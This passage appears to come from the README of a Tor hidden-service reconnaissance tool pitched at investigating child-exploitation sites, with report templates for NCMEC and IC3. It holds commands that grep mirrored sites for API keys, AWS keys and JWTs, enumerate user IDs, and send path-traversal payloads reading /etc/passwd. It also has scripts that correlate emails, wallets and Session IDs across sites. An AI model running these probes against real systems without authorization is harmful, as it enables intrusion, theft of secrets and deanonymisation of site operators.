grep -r -E "(API_KEY|SECRET|PASSWORD|TOKEN|AKIA|sk_live|pk_live|GATSBY_|REACT_APP_|VUE_APP_|NEXT_PUBLIC_)" target.onion/
# Look for .env patterns in JS
grep -r -E "process\.env\.[A-Z_]+" target.onion/
# Search for base64 encoded credentials
find target.onion -name "*.js" -exec grep -E "([A-Za-z0-9+/]{40,}={0,2})" {} \;
# Check for hardcoded AWS keys
grep -r -E "AKIA[0-9A-Z]{16}" target.onion/
# Check for JWT tokens
grep -r -E "eyJ[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+\.[a-zA-Z0-9_-]+" target.onion/
```
If you find any dynamic routes like /user/123 or /post/456:
```bash
# Create a list of potential IDs to test
seq 1 100 > ids.txt
# Test each ID
while read id; do
  echo -n "Checking /user/$id... "
  curl -s -o /dev/null -w "%{http_code}\n" --proxy socks5h://127.0.0.1:9050 \
    "http://target.onion/user/$id"
done < ids.txt | grep -v "404"
# Test for GUIDs/UUIDs
cat > uuids.txt << EOF
00000000-0000-0000-0000-000000000000
11111111-1111-1111-1111-111111111111
12345678-1234-1234-1234-123456789012
aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa
ffffffff-ffff-ffff-ffff-ffffffffffff
EOF
while read uuid; do
  curl -s --proxy socks5h://127.0.0.1:9050 "http://target.onion/user/$uuid" -I | head -1
done < uuids.txt
# Test for path traversal in file downloads
for traversal in ../../../etc/passwd ..\\..\\..\\windows\\win.ini ....//....//....//etc/passwd; do
  echo -n "Testing $traversal... "
  curl -s --proxy socks5h://127.0.0.1:9050 \
    "http://target.onion/download?file=$traversal" | head -20
done
# Test for parameter pollution
curl -s --proxy socks5h://127.0.0.1:9050 \
  "http://target.onion/api/user?id=1&id=2" | jq .
```
Build a network graph of related sites:
```bash
# Create a script to correlate identifiers
cat > correlate.sh << 'EOF'
#!/bin/bash
TARGET=$1
echo "Analyzing $TARGET..."
# Get all identifiers
curl -s --proxy socks5h://127.0.0.1:9050 $TARGET > page.html
# Extract all identifiers
emails=$(grep -o -E "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" page.html | sort -u)
btc=$(grep -o -E "\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b" page.html | sort -u)
xmr=$(grep -o -E "\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b|\b8[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b" page.html | sort -u)
session_ids=$(grep -o -E "05[a-f0-9]{62,64}" page.html | sort -u)
telegram=$(grep -o -E "t\.me/[a-zA-Z0-9_]+|@[a-zA-Z0-9_]{5,}" page.html | sort -u)
discord=$(grep -o -E "discord\.gg/[a-zA-Z0-9]+" page.html | sort -u)
onions=$(grep -o -E "[a-zA-Z0-9]{56}\.onion" page.html | sort -u)
pgp=$(grep -o -E "-----BEGIN PGP PUBLIC KEY BLOCK-----" page.html | wc -l)
echo "Emails: $emails"
echo "BTC: $btc"
echo "XMR: $xmr"
echo "Session IDs: $session_ids"
echo "Telegram: $telegram"
echo "Discord: $discord"
echo "Linked .onions: $onions"
echo "PGP Keys: $pgp"
# Save for correlation
echo "$TARGET|$emails|$btc|$xmr|$session_ids|$telegram|$discord" >> correlation_db.txt
EOF
chmod +x correlate.sh
# Run against multiple targets
./correlate.sh http://target1.onion
./correlate.sh http://target2.onion
# Find common identifiers
echo "=== Common Emails ==="
cat correlation_db.txt | grep -o -E "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort | uniq -c | sort -nr
echo "=== Common BTC Wallets ==="
cat correlation_db.txt | grep -o -E "\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b" | sort | uniq -c | sort -nr
echo "=== Common Session IDs ==="
cat correlation_db.txt | grep -o -E "05[a-f0-9]{62,64}" | sort | uniq -c | sort -nr
```
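The `identifiers` command described earlier and the correlate.sh script above do the same job: pull identifiers out of each page and flag the ones that recur across sites. The following is an added example of that extraction-and-correlation step, not the project's identity_extractor.py or session_id_tracker.py. The patterns follow the regexes used on this page, with two tightenings that are this example's own: the .onion pattern is restricted to the v3 base32 alphabet and its embedded checksum is verified (pubkey, checksum and version byte packed into the address, with the checksum being the first two bytes of SHA3-256 over ".onion checksum" || pubkey || version), and Session IDs are taken as 05 followed by exactly 64 hex characters. The two sample pages and every identifier in them are constructed.

```python
import base64
import hashlib
import re

# Patterns from this page's grep commands, tightened as described in the lead-in.
PATTERNS = {
    "email":    r"[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}",
    "btc":      r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b|\bbc1[a-zA-Z0-9]{38,}\b",
    "xmr":      r"\b[48][0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b",
    "session":  r"\b05[a-f0-9]{64}\b",
    "telegram": r"t\.me/[a-zA-Z0-9_]+",
    "discord":  r"discord\.gg/[a-zA-Z0-9]+",
    "onion":    r"\b[a-z2-7]{56}\.onion\b",
}


def valid_v3_onion(addr):
    """Verify the checksum embedded in a v3 address: base32(pubkey|checksum|version)
    with checksum = SHA3-256(".onion checksum" | pubkey | version)[:2]."""
    try:
        raw = base64.b32decode(addr[:-len(".onion")].upper())
    except (ValueError, TypeError):
        return False
    if len(raw) != 35 or raw[34] != 3:
        return False
    pubkey, checksum = raw[:32], raw[32:34]
    expected = hashlib.sha3_256(b".onion checksum" + pubkey + b"\x03").digest()[:2]
    return expected == checksum


def make_v3_onion(pubkey):
    """Inverse of the check; used here only to build a constructed sample address."""
    checksum = hashlib.sha3_256(b".onion checksum" + pubkey + b"\x03").digest()[:2]
    return base64.b32encode(pubkey + checksum + b"\x03").decode().lower() + ".onion"


def extract(html):
    """Return {kind: sorted unique values} found in one page's text."""
    found = {}
    for kind, pattern in PATTERNS.items():
        values = set(re.findall(pattern, html))
        if kind == "onion":  # drop strings that merely look like an address
            values = {v for v in values if valid_v3_onion(v)}
        found[kind] = sorted(values)
    return found


def correlate(pages):
    """pages: dict site -> html. Returns {(kind, value): [sites]} for every
    identifier that appears on two or more sites."""
    seen = {}
    for site, html in pages.items():
        for kind, values in extract(html).items():
            for value in values:
                seen.setdefault((kind, value), set()).add(site)
    return {key: sorted(sites) for key, sites in seen.items() if len(sites) > 1}


# Constructed sample pages; none of these identifiers belong to a real site.
ONION_VALID = make_v3_onion(b"\x01" * 32)   # checksum-valid address from a dummy key
ONION_BOGUS = "a" * 56 + ".onion"           # right shape, wrong checksum
SESSION_ID = "05" + "ab" * 32               # 66 hex characters
SAMPLE_PAGES = {
    "http://site-a.onion": "<p>Contact ops@example.com, Session %s, mirror %s</p>"
                           % (SESSION_ID, ONION_VALID),
    "http://site-b.onion": "<p>ops@example.com | t.me/sample_channel | %s | %s</p>"
                           % (SESSION_ID, ONION_BOGUS),
}

if __name__ == "__main__":
    for (kind, value), sites in sorted(correlate(SAMPLE_PAGES).items()):
        print("%-8s %s  seen on: %s" % (kind, value, ", ".join(sites)))
```

The checksum step is what keeps random 56-character base32 strings (and any uppercase or digit-0 string the page's `[a-zA-Z0-9]{56}\.onion` grep would accept) out of the "linked .onion" list. A shared identifier is still only a lead: a donation address or a public escrow contact can legitimately appear on unrelated sites, so corroborate a cross-site hit with the structural and metadata checks before treating two sites as one operator.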
When you find evidence, format it properly:
```bash
# Generate NCMEC CyberTipline format
cat > ncmec_report.txt << EOF
Date: $(date +%Y-%m-%d)
URL: http://target.onion
FINDINGS:
$(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i -E "child|cp|lolita|764|pedo|young|teen|preteen" | head -20)
IDENTIFIERS:
Emails: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | tr '\n' ',')
BTC Wallets: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b|\bbc1[a-zA-Z0-9]{38,}\b" | sort -u | tr '\n' ',')
XMR Wallets: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "\b4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b|\b8[0-9AB][1-9A-HJ-NP-Za-km-z]{93}\b" | sort -u | tr '\n' ',')
Session IDs: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "05[a-f0-9]{62,64}" | sort -u | tr '\n' ',')
Telegram: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "t\.me/[a-zA-Z0-9_]+|@[a-zA-Z0-9_]{5,}" | sort -u | tr '\n' ',')
Discord: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "discord\.gg/[a-zA-Z0-9]+" | sort -u | tr '\n' ',')
TECHNICAL DETAILS:
Server: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion -I | grep -i server)
Generator: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i generator | head -1)
LINKED .ONION SITES:
$(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -o -E "[a-zA-Z0-9]{56}\.onion" | sort -u)
EOF
echo "Report saved to ncmec_report.txt"
echo "Submit at: https://report.cybertip.org/"
# FBI IC3 format
cat > ic3_report.txt << EOF
IC3 COMPLAINT - CHILD EXPLOITATION
Date Discovered: $(date +%Y-%m-%d)
.onion URL: http://target.onion
Description of Illicit Content:
$(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion | grep -i -E "child|cp|lolita|764|pedo" | head -10)
Associated Identifiers:
- Email addresses: [list emails]
- Cryptocurrency wallets: [list wallets]
- Session IDs: [list session IDs]
- Chat platform invites: [list invites]
Technical Infrastructure:
- Web Server: $(curl -s --proxy socks5h://127.0.0.1:9050 http://target.onion -I | grep -i server)
- Technology Stack: [identified from fingerprinting]
- Linked Domains: [list linked .onion]
Submit at: https://www.ic3.gov/
EOF
```
```bash
# Install all recommended tools
sudo apt update
sudo apt install -y gobuster dirb wfuzz curl wget grep tor torify proxychains4 nmap nikto whatweb jq
# Install additional tools
pip3 install pygobuster httpx nuclei wpscan joomscan
# Install special tools
git clone https://github.com/drwetter/testssl.sh.git
cd testssl.sh && chmod +x testssl.sh
# Verify Tor is working
torify curl https://check.torproject.org/api/ip
```
| Technology | Key Files/Paths | Testing Commands |
|---|---|---|
| Nginx | /nginx_status, /status | curl -I \| grep Server |
| Apache | /server-status, /.htaccess | curl /server-status |
| IIS | /trace.axd, /elmah.axd | curl /trace.axd |
| MySQL | /phpmyadmin, .sql backups | grep -r "mysql://" |
| PostgreSQL | /pgadmin, postgres:// | grep -r "postgresql://" |
| MongoDB | mongodb://, port 27017 | curl port:27017 |
| WordPress | wp-content, wp-config.php | wpscan |
| Joomla | configuration.php | joomscan |
| Drupal | sites/default/settings.php | drupalgeddon2 |
| Gatsby | /page-data/, /___graphql | curl /___graphql |
| Flask | /console, debug mode | curl /notfound |
| Django | /admin, settings.py | curl /admin |
| Node.js | package.json, .env | curl /package.json |
| PHP | phpinfo.php, ini.php | curl /phpinfo.php |
This tool is designed for legitimate security assessments, threat intelligence operations, and forensic investigations. Users must obtain explicit written authorization before scanning any systems or networks. Unauthorized scanning of .onion services or any other infrastructure may violate local, national, and international laws. The developer assumes no liability for misuse or illegal activities conducted with this software.